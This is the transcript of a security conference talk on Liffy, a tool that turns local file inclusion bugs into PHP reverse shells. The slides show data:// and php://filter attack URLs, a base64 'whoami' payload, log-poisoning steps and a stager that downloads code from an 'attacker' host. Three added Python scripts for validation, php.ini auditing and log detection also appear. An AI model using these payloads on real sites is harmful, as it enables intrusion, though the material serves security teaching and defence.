From Ashy To Classy | LFI Exploitation with Liffy
From Ashy To Classy | LFI Exploitation with Liffy Presentation Transcript

  • 1. From Ashy To Classy LFI Exploitation with Liffy
  • 2. Agenda
    ◦ File Inclusion Vulnerability History and Overview
    ◦ Liffy Introduction
    ◦ Techniques
    ◦ Considerations
    ◦ Future Development
  • 3. #whoami
    ◦ Application Security Practice Manager @VerSprite – We love product security!
    ◦ I <3 Python and Java
    ◦ Enterprise WebApp Background
    ◦ CTF player and boot2rooter
    ◦ Twitter: @rotlogix
    ◦ Personal Blog: http://rotlogix.com
  • 4. LFI History and Overview
    ◦ What is it? "The process of including files, that are already locally present on the server, through the exploiting of vulnerable inclusion procedures implemented in the application." – https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion
    ◦ Issues with include() and require(): untrusted code evaluation
    ◦ Example: <?php include($_GET['file']); ?> = http://target/find.php?file=/etc/passwd
    ◦ <?php include("files/".$_GET['file'].".php"); ?> = requires traversal ("../../") and a null byte (%00)
    ◦ The problem is passing a user-controlled URL parameter as the file argument of an include or require statement.
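The two include() snippets on this slide are the vulnerable side; the fix is to validate the parameter before it ever reaches include(). The following check is an added example written for this page, not code from the talk or from Liffy, and the INCLUDE_ROOT path and the page-name pattern are assumptions. It is written in Python so it can be run as-is, but the logic maps one-to-one onto the PHP case: allowlist the name, refuse stream wrappers, traversal and NUL bytes, then confirm the resolved path is still under a fixed directory.

```python
"""Validating a user-controlled include parameter (added defensive example)."""
import os
import re

# Assumed application layout for the example; not a path from the slides.
INCLUDE_ROOT = "/var/www/app/pages"

# Only short names made of safe characters are acceptable page identifiers.
PAGE_NAME = re.compile(r"[A-Za-z0-9_-]{1,32}")


class IncludeRejected(ValueError):
    """Raised when a user-supplied include name fails validation."""


def resolve_include(user_value: str, root: str = INCLUDE_ROOT) -> str:
    """Map a user-supplied page name to an absolute .php path under `root`.

    Raises IncludeRejected for the inputs LFI payloads depend on: NUL bytes
    (used to cut off an appended ".php"), stream wrappers such as data:// or
    php://filter, traversal sequences, and absolute paths.
    """
    if "\x00" in user_value:
        raise IncludeRejected("NUL byte in include name")
    if "://" in user_value:
        raise IncludeRejected("stream wrapper in include name")
    # fullmatch, not match: "$" would still accept a trailing newline.
    if not PAGE_NAME.fullmatch(user_value):
        # Catches "../", "/etc/passwd", "%00" text and anything else outside the pattern.
        raise IncludeRejected("include name does not match allowlist pattern")
    candidate = os.path.normpath(os.path.join(root, user_value + ".php"))
    # Defence in depth: the regex already guarantees this, but check the resolved path anyway.
    if os.path.commonpath([root, candidate]) != root:
        raise IncludeRejected("resolved path escapes include root")
    return candidate


def is_allowed(user_value: str) -> bool:
    """Convenience wrapper: True if the name would be accepted, False otherwise."""
    try:
        resolve_include(user_value)
    except IncludeRejected:
        return False
    return True


if __name__ == "__main__":
    # Constructed sample inputs: one legitimate page name and the payload shapes from the talk.
    for value in ["home", "../../etc/passwd", "/etc/passwd",
                  "data://text/html;base64,PD9waHAgc3lzdGVtKCd3aG9hbWknKTsgPz4=",
                  "php://filter/convert.base64-encode/resource=lfi.php",
                  "home\x00"]:
        print(repr(value), "->", "allowed" if is_allowed(value) else "rejected")
```

The allowlist regex does most of the work; the explicit NUL and "://" checks exist so that a later relaxation of the pattern (say, to permit "/") still cannot reintroduce the wrapper and null-byte tricks the slides describe.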
  • 5. LFI History and Overview
    ◦ GitHub LULZ
  • 6. LFI History and Overview
    ◦ File inclusion vulnerabilities have been around forever! 2002?
    ◦ Around 340 "Inclusion" related entries on Exploit-DB over the last 5 years
    ◦ Vulnerability dropped from the OWASP Top 10 in 2010
    ◦ My opinion? Doesn't matter. Consider all the legacy PHP applications out there, and plugin development for things like WordPress
  • 7. Liffy Introduction
    ◦ A tool that attempts to turn a seemingly "read-only" LFI vulnerability into a full-blown PHP Meterpreter web shell
    ◦ Developed in Python
    ◦ Currently has 10 features, which we will discuss
    ◦ Uses Python's SimpleHTTPServer library to spawn a web server as needed for payload staging
    ◦ Major enhancements added by Dan 'unicornFurnace' Crowley @SpiderLabs
  • 8. Liffy Feature Overview
    ◦ data:// – stream wrapper (code execution)
    ◦ php://input – stream wrapper (code execution)
    ◦ php://filter – stream wrapper (file reads)
    ◦ php://expect – process control extension (code execution)
    ◦ /proc/self/environ – CGI mode (code execution)
    ◦ Apache access log poisoning (code execution)
    ◦ Linux auth log poisoning (code execution)
    ◦ Support for absolute and relative paths (log poisoning)
    ◦ Support for cookies
    ◦ Direct or staged payload delivery
  • 9. Payload Generation
    ◦ Leverages msfpayload
    ◦ PHP Meterpreter Reverse TCP
    ◦ Liffy allows you to specify your own LHOST and LPORT for the Meterpreter
    ◦ Creates a corresponding resource file which loads a multi-handler
  • 10. Direct & Staged Payloads
    ◦ This simply means directly executing your payload, or using additional code to download and execute your payload through the chosen technique (data://, php://input, etc.)
    ◦ Staged delivery:
      1. Generate PHP Meterpreter through msfpayload (stored: /tmp/{random}.php)
      2. Encode and use <?php eval(file_get_contents('http://local:8000/{random}.php')) ?>
      3. Spawn a temporary web server to host the shell out of the /tmp directory
      4. Stager downloads and executes the shell
      5. Listening handler catches the reverse shell
    ◦ Direct delivery:
      1. Generate PHP Meterpreter through msfpayload (stored: /tmp/{random}.php)
      2. Read the payload from the stored file (/tmp/{random}.php)
      3. Encode and send it directly through the wrapper – data://text/html;base64,{payload}
      4. Listening handler catches the reverse shell
  • 11. Techniques: data://
    ◦ RFC 2397 – data URL scheme: "Allows the inclusion of small data items as 'immediate' data, as if it had been included externally"
    ◦ Stream wrapper supported since PHP 5.2.0
    ◦ Usage: data://text/html;base64,{encoded code here}
    ◦ Restricted by allow_url_include (enabled / disabled), set in php.ini
    ◦ If enabled you would potentially have an RFI as well: "Allows the use of URL-aware file open wrappers with functions like include"
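allow_url_include is the one directive that decides whether data:// (and, two slides on, php://input) can be fed to an include() bug, so it belongs in every PHP host review. The audit script below is an added example written for this page, not part of the talk or of Liffy; both php.ini fragments are constructed for it, and the recommended values are ordinary hardening choices rather than anything the slides prescribe. It generalises a little beyond the slide by also reporting the neighbouring directives that change how much an LFI can reach or reveal.

```python
"""Checking php.ini for the settings that decide whether an LFI stays read-only (added example)."""
from typing import Dict, List

# Constructed weak configuration (not from any real server).
WEAK_PHP_INI = """
; constructed sample
allow_url_fopen = On
allow_url_include = On
display_errors = On
expose_php = On
;open_basedir = /var/www/app
"""

# Constructed hardened configuration for comparison.
HARDENED_PHP_INI = """
allow_url_fopen = Off
allow_url_include = Off
display_errors = Off
expose_php = Off
open_basedir = /var/www/app:/tmp
"""

# Built-in PHP defaults that apply when a directive is absent from php.ini.
DEFAULTS = {
    "allow_url_fopen": "1",
    "allow_url_include": "0",
    "display_errors": "1",
    "expose_php": "1",
}

# Why each directive matters once an include() takes user input.
REASONS = {
    "allow_url_include": "lets include() read data:// and php://input, turning file reads into code execution",
    "allow_url_fopen": "lets file functions fetch remote URLs; only needed by applications that actually do so",
    "display_errors": "leaks paths and include failures that reveal log locations and includable paths",
    "expose_php": "advertises the PHP version in the Server header",
}


def parse_php_ini(text: str) -> Dict[str, str]:
    """Parse the 'key = value' lines of a php.ini fragment, ignoring comments and section headers."""
    settings: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()  # ';' starts a comment, so ';open_basedir' is ignored
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        settings[key.lower()] = value.strip('"').lower()
    return settings


def is_on(value: str) -> bool:
    """php.ini accepts several spellings for a boolean true."""
    return value in ("1", "on", "true", "yes")


def audit_php_ini(text: str) -> List[str]:
    """Return one finding per risky directive that is enabled (explicitly or by default)."""
    settings = parse_php_ini(text)
    findings: List[str] = []
    for key, reason in REASONS.items():
        value = settings.get(key, DEFAULTS[key])
        if is_on(value):
            origin = "explicit" if key in settings else "default"
            findings.append(f"{key}={value} ({origin}): {reason}")
    if "open_basedir" not in settings:
        findings.append("open_basedir not set: include() may reach any path the web server user can read")
    return findings


if __name__ == "__main__":
    for label, ini in (("weak", WEAK_PHP_INI), ("hardened", HARDENED_PHP_INI)):
        print(f"[{label}]")
        for finding in audit_php_ini(ini) or ["no findings"]:
            print("  -", finding)
```

Note that php://filter reads (slide 25) are not gated by allow_url_include at all, which is why the script also insists on open_basedir: that directive is what limits which files a read-only inclusion can reach.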
  • 12. Techniques: data://
    ◦ How do we use this?
    ◦ http://target.com/lfi.php?file=data://text/html;base64,PD9waHAgc3lzdGVtKCd3aG9hbWknKTsgPz4=
    ◦ <?php system('whoami'); ?> = PD9waHAgc3lzdGVtKCd3aG9hbWknKTsgPz4=
  • 13. Techniques: data://
    ◦ How does Liffy use this?
    ◦ Non-staged:
      1. Generate payload with msfpayload and resource file
      2. Read payload from the generated file
      3. Encode the payload
      4. Load listening handler for reverse connections
      5. Deliver it directly: data://text/html;base64,{payload}
    ◦ Staged:
      1. Generate payload with msfpayload and resource file
      2. Encode <?php eval(file_get_contents('http://attacker:8000/{shell}.php')) ?>
      3. Load listening handler for reverse connections
      4. Spawn web server to host payload
      5. Execute
  • 14. Techniques: data:// > DEMO!
  • 15. Techniques: php://input
    ◦ Read-only stream wrapper
    ◦ Used in POST requests; lets the included script read the raw POST data
    ◦ Restricted by allow_url_include
    ◦ Example:
  • 16. Techniques: php://input
    ◦ How does Liffy implement this technique? Exactly the same as data://
    ◦ Staged and non-staged approach
    ◦ Really you should always choose non-staged in this scenario: POST (direct delivery) = non-staged
  • 17. Techniques: php://input > DEMO!
  • 18. Techniques: SSH auth.log Poisoning
    ◦ Assumes you can include the SSH auth.log; if you can, there is usually a misconfiguration issue!
    ◦ The process of injecting PHP code through failed login attempts
    ◦ Code now appears in the auth.log
    ◦ Include auth.log for code execution!
  • 20. Techniques: SSH auth.log Poisoning
    ◦ Liffy implements this by creating a payload through msfpayload
    ◦ Reads the PHP payload and assigns it to "payload_1"
    ◦ Uses <?php eval($_GET['code']) ?> as "payload_2"
    ◦ The second payload is used to poison the auth.log
    ◦ The first payload is what is called after the final inclusion: "&code="
    ◦ Supports path traversal sequences if needed: "../", "..", "/../"
  • 21. Techniques: SSH auth.log Poisoning > DEMO!
  • 22. Techniques: Apache access.log Poisoning
    ◦ Requires being able to include the access.log, which means you might have to ../../../ (/var/log/apache2/access.log)
    ◦ Poison logs through the User-Agent by injecting PHP code
    ◦ Include the access.log and your PHP code gets evaluated
  • 23. Techniques: Apache access.log Poisoning
    ◦ If the log location isn't different (you should know this), Liffy defaults to the most common location
    ◦ Supports path traversal as we already saw with the auth.log
    ◦ Payload creation is the same, but with direct delivery only
    ◦ Encodes the payload in base64 and uses eval(base64_decode()); to get around double or single quotes causing parse errors
    ◦ Again, everything gets delivered through the User-Agent
  • 24. Techniques: Apache access.log Poisoning > DEMO!
  • 25. Techniques: php://filter
    ◦ Wrapper that lets you apply filters to a stream when it is opened
    ◦ Takes a resource argument, which is what you want to read
    ◦ Used in conjunction with the base64 encoding "conversion filter"
    ◦ Takes the resource > streams and reads the data > converts to base64 > output is a base64 encoded string
    ◦ Example: http://target.com/vuln/lfi.php?file=php://filter/convert.base64-encode/resource=lfi.php
  • 26. Techniques: php://filter
    ◦ Liffy automates this for you!
    ◦ Prompts you for a file that you want to read
    ◦ Decodes the encoded string and echoes the contents back to the terminal
    ◦ Useful for viewing PHP source from files you have access to
  • 27. Techniques: php://filter > DEMO!
  • 28. Future Work
    ◦ Make the internal web server smarter and more reliable
    ◦ Better object-oriented design
    ◦ Re-write the command-line interface
    ◦ Dynamic request object building and re-use for everything HTTP
    ◦ Support bypassing filters for path traversals
    ◦ Write custom PHP reverse shell with built-in handler
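Every technique from the data:// slides (11-17) through log poisoning (18-24) and php://filter (25-27) leaves a distinctive trace in the web server's own access log: a stream wrapper or traversal sequence in the query string, a request naming auth.log, access.log or /proc/self/environ, or PHP tags sitting in the User-Agent. The script below is an added detection example written for this page, not code from the talk or from Liffy; the log lines are constructed, reusing the URLs and the base64 payload shown on the slides, and the indicator list is an assumption you would extend with your own log paths.

```python
"""Flagging LFI probes and log poisoning in Apache access logs (added detection example)."""
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Apache combined log format: host ident user [time] "request" status size "referer" "user-agent".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Indicators drawn from the techniques in the talk.
WRAPPER_RE = re.compile(r"\b(?:data|php|expect)://", re.I)
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")
SENSITIVE_RE = re.compile(
    r"/proc/self/environ|/var/log/(?:apache2|httpd)/access\.log|/var/log/auth\.log|/etc/passwd", re.I)
PHP_TAG_RE = re.compile(r"<\?(?:php\b|=)", re.I)

# Constructed sample log (documentation IP range), built from the slide URLs and payload text.
SAMPLE_LOG = [
    '198.51.100.10 - - [10/Oct/2014:13:55:36 +0000] "GET /index.php?page=home HTTP/1.1" 200 2326 "-" "Mozilla/5.0"',
    '198.51.100.11 - - [10/Oct/2014:13:55:40 +0000] "GET /lfi.php?file=data://text/html;base64,PD9waHAgc3lzdGVtKCd3aG9hbWknKTsgPz4= HTTP/1.1" 200 48 "-" "Mozilla/5.0"',
    '198.51.100.11 - - [10/Oct/2014:13:55:52 +0000] "GET /lfi.php?file=../../../../var/log/apache2/access.log HTTP/1.1" 200 91320 "-" "Mozilla/5.0"',
    '198.51.100.11 - - [10/Oct/2014:13:56:01 +0000] "GET / HTTP/1.1" 200 612 "-" "<?php system(\'whoami\'); ?>"',
    '198.51.100.12 - - [10/Oct/2014:13:56:15 +0000] "GET /vuln/lfi.php?file=php://filter/convert.base64-encode/resource=lfi.php HTTP/1.1" 200 1320 "-" "Mozilla/5.0"',
    '198.51.100.12 - - [10/Oct/2014:13:56:30 +0000] "GET /lfi.php?file=%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]


def analyze_line(line: str) -> Optional[Dict[str, object]]:
    """Parse one log line; return ip, request target and indicator tags, or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    fields = m.group("request").split(" ")
    target = fields[1] if len(fields) >= 2 else m.group("request")
    decoded = unquote(unquote(target))  # two passes catch double-encoded traversal
    tags: List[str] = []
    if WRAPPER_RE.search(decoded):
        tags.append("stream-wrapper")
    if TRAVERSAL_RE.search(decoded):
        tags.append("path-traversal")
    if SENSITIVE_RE.search(decoded):
        tags.append("sensitive-file")
    if PHP_TAG_RE.search(decoded):
        tags.append("php-in-url")
    # PHP tags in a header Apache writes to its log are the precondition for log poisoning.
    if PHP_TAG_RE.search(m.group("agent")) or PHP_TAG_RE.search(m.group("referer")):
        tags.append("log-poisoning")
    return {"ip": m.group("ip"), "target": target, "tags": tags}


def tags_for(line: str) -> List[str]:
    """Indicator tags for a single line (empty list for benign or unparseable lines)."""
    entry = analyze_line(line)
    return [] if entry is None else list(entry["tags"])


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Return only the entries that carry at least one indicator."""
    hits = []
    for line in lines:
        entry = analyze_line(line)
        if entry and entry["tags"]:
            hits.append(entry)
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ip"], ",".join(hit["tags"]), hit["target"])
```

The poisoning line is the one to watch: the User-Agent is not a sensitive value in itself, but PHP tags in any header that ends up in a file an include() can reach are exactly the setup slides 22 and 23 describe, and a match there should be correlated with any later request whose query string names that log file.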